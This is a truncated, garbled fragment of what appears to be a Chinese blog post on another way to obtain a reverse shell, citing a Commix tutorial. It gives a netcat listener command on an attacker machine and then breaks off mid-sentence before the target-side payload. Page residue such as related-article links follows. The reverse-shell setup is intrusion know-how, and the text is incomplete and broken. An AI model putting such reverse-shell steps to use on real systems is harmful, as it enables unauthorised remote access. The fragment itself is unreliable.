另外一种反弹shell的方式

参考: http://zeroyu.xyz/2017/01/21/Commix%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/php Python 先在本身机器上执行python [~]$ nc -vl 192.168.170.1 1234 即在192.168.170.1/24网段上监听1234端口。 而后在target的shell中执行web [~/repos/CTF/
相关文章
相关标签/搜索